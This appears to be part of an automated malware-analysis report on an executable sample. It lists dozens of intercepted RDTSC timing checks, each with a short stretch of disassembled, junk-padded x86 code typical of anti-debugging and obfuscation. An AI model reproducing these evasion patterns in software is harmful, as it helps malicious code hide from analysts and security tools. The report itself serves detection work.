              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FD734E second address: E07EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007F646CD14788h 0x00000011 pop eax 0x00000012 stc 0x00000013 push dword ptr [ebp+122D0AA5h] 0x00000019 jns 00007F646CD1478Bh 0x0000001f call dword ptr [ebp+122D29CCh] 0x00000025 pushad 0x00000026 stc 0x00000027 xor eax, eax 0x00000029 jl 00007F646CD14788h 0x0000002f jmp 00007F646CD14782h 0x00000034 mov edx, dword ptr [esp+28h] 0x00000038 mov dword ptr [ebp+122D3451h], esi 0x0000003e sub dword ptr [ebp+122D3451h], edx 0x00000044 mov dword ptr [ebp+122D3AE0h], eax 0x0000004a cld 0x0000004b mov esi, 0000003Ch 0x00000050 clc 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 jmp 00007F646CD1477Ah 0x0000005a lodsw 0x0000005c mov dword ptr [ebp+122D24F3h], esi 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 cmc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b jnl 00007F646CD1477Ch 0x00000071 nop 0x00000072 pushad 0x00000073 push eax 0x00000074 jl 00007F646CD14776h 0x0000007a pop eax 0x0000007b push edx 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDE10F second address: FDE113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDCE8F second address: FDCE94 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD467 second address: FDD471 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F646C53F7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD605 second address: FDD613 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD780 second address: FDD786 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD786 second address: FDD7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 jo 00007F646CD147AAh 0x0000000d jno 00007F646CD1477Eh 0x00000013 pushad 0x00000014 jmp 00007F646CD14782h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD8E7 second address: FDD8EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD8EB second address: FDD8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDD8EF second address: FDD8F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDDA45 second address: FDDA51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F646CD14776h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDDCF5 second address: FDDCF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDDE10 second address: FDDE14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FDDE14 second address: FDDE23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE246F second address: FE2473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2473 second address: FE247E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE247E second address: FE2484 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE25D7 second address: FE25DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE25DB second address: FE25E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2A59 second address: FE2A61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2D0F second address: FE2D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2D13 second address: FE2D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2FF1 second address: FE2FF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: F91DF4 second address: F91E04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 jo 00007F646C53F7B0h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2002 second address: FE2014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F646CD1477Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2014 second address: FE204D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F646C53F7A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F646C53F7ADh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007F646C53F7B8h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE204D second address: FE2053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2053 second address: FE2057 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE2057 second address: FE207D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F646CD14776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F646CD14785h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FE5257 second address: FE5261 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F646C53F7A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5A39 second address: FB5A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5A3F second address: FB5A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov ecx, dword ptr [ebp+122D1E9Bh] 0x0000000f lea eax, dword ptr [ebp+124817A3h] 0x00000015 or dword ptr [ebp+122D2864h], ebx 0x0000001b mov dword ptr [ebp+122D37DAh], edx 0x00000021 nop 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F646C53F7ACh 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5A6F second address: F912A0 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F646CD14778h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007F646CD14782h 0x00000012 pop edx 0x00000013 pop edx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F646CD14778h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 0000001Ah 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D3474h], eax 0x00000035 movsx edi, bx 0x00000038 mov edx, dword ptr [ebp+122D39A5h] 0x0000003e call dword ptr [ebp+122D2036h] 0x00000044 jc 00007F646CD14798h 0x0000004a jng 00007F646CD14782h 0x00000050 ja 00007F646CD14776h 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5B35 second address: FB5B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB5B3B second address: FB5B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB608D second address: FB6093 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6313 second address: FB632D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F646CD14785h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB632D second address: FB6352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a jmp 00007F646C53F7ACh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F646C53F7ADh 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB63DE second address: FB63EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F646CD1477Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6568 second address: FB65B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov ecx, 47637D2Bh 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F646C53F7A8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Dh 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 ja 00007F646C53F7A9h 0x0000002f movsx ecx, dx 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 ja 00007F646C53F7A6h 0x0000003d rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB65B3 second address: FB65B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB65B7 second address: FB65BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB65BD second address: FB65D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD1477Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F646CD14778h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6953 second address: FB6957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\661fW9gxDp.exeRDTSC instruction interceptor: First address: FB6957 second address: FB695D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FB695D second address: FB6A00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F646C53F7A8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 ja 00007F646C53F7ABh 0x0000002b or edi, dword ptr [ebp+122D365Eh] 0x00000031 push 0000001Eh 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F646C53F7A8h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000017h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d jne 00007F646C53F7D7h 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 jmp 00007F646C53F7AAh 0x0000005c pop eax 0x0000005d rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FB6A00 second address: FB6A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F646CD14776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FB6D03 second address: FB6D4D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b jmp 00007F646C53F7B5h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007F646C53F7B3h 0x0000001c jmp 00007F646C53F7ADh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FB6D4D second address: FB6D73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007F646CD14776h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F646CD1477Eh 0x00000017 push eax 0x00000018 pop eax 0x00000019 popad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FB6E0E second address: F91DF4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jng 00007F646C53F7B7h 0x0000000f jmp 00007F646C53F7B1h 0x00000014 popad 0x00000015 mov dword ptr [esp], eax 0x00000018 lea eax, dword ptr [ebp+124817E7h] 0x0000001e push 00000000h 0x00000020 push ebx 0x00000021 call 00007F646C53F7A8h 0x00000026 pop ebx 0x00000027 mov dword ptr [esp+04h], ebx 0x0000002b add dword ptr [esp+04h], 0000001Ah 0x00000033 inc ebx 0x00000034 push ebx 0x00000035 ret 0x00000036 pop ebx 0x00000037 ret 0x00000038 add edx, dword ptr [ebp+122D31C9h] 0x0000003e push eax 0x0000003f jng 00007F646C53F7B4h 0x00000045 mov dword ptr [esp], eax 0x00000048 call 00007F646C53F7ACh 0x0000004d jo 00007F646C53F7ACh 0x00000053 or edi, 627B1402h 0x00000059 pop edx 0x0000005a lea eax, dword ptr [ebp+124817A3h] 0x00000060 cld 0x00000061 push eax 0x00000062 jng 00007F646C53F7AEh 0x00000068 jbe 00007F646C53F7A8h 0x0000006e pushad 0x0000006f popad 0x00000070 mov dword ptr [esp], eax 0x00000073 cld 0x00000074 or dword ptr [ebp+122D28A3h], esi 0x0000007a call dword ptr [ebp+122D20DBh] 0x00000080 push edi 0x00000081 push ecx 0x00000082 push edi 0x00000083 pop edi 0x00000084 pop ecx 0x00000085 push eax 0x00000086 push edx 0x00000087 jp 00007F646C53F7A6h 0x0000008d rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FE93C1 second address: FE93C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FE93C5 second address: FE93D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F646C53F7A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FED8C8 second address: FED8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FED8CC second address: FED8E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646C53F7B4h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FED8E4 second address: FED8EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF5250 second address: FF5254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF54AC second address: FF54B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F646CD14776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF57AD second address: FF57C5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F646C53F7A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jbe 00007F646C53F7A6h 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF57C5 second address: FF57E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F646CD1477Dh 0x0000000d jmp 00007F646CD1477Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF5910 second address: FF5914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF4F9B second address: FF4FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F646CD14776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF5D18 second address: FF5D1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF5D1C second address: FF5D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F646CD14776h 0x0000000d jmp 00007F646CD1477Ah 0x00000012 popad 0x00000013 jne 00007F646CD14778h 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push edi 0x0000001f pop edi 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 popad 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jc 00007F646CD14776h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF8453 second address: FF8459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF8459 second address: FF845F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FF845F second address: FF8471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jl 00007F646C53F7A6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FFB070 second address: FFB07A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F646CD14776h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FFB07A second address: FFB0C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F646C53F7BAh 0x0000000c jno 00007F646C53F7BDh 0x00000012 popad 0x00000013 push ebx 0x00000014 pushad 0x00000015 jp 00007F646C53F7A6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FFB240 second address: FFB25E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F646CD14787h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FFB25E second address: FFB269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: FFB269 second address: FFB26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1001D53 second address: 1001D81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F646C53F7ACh 0x00000012 jnp 00007F646C53F7B5h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 100061A second address: 100061E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 100061E second address: 1000626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1000799 second address: 10007BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F646CD14788h 0x00000009 push edx 0x0000000a pop edx 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 100092E second address: 1000932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1000932 second address: 1000982 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14782h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jl 00007F646CD14776h 0x00000012 pushad 0x00000013 popad 0x00000014 pop eax 0x00000015 popad 0x00000016 pushad 0x00000017 jnl 00007F646CD14778h 0x0000001d jmp 00007F646CD1477Bh 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F646CD14781h 0x0000002a pop edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1000982 second address: 1000986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1000C29 second address: 1000C83 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F646CD14789h 0x00000007 jmp 00007F646CD14783h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F646CD1477Eh 0x00000013 jmp 00007F646CD14780h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007F646CD14776h 0x00000022 push ecx 0x00000023 pop ecx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\661fW9gxDp.exe RDTSC instruction interceptor: First address: 1000C83 second address: 1000C87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
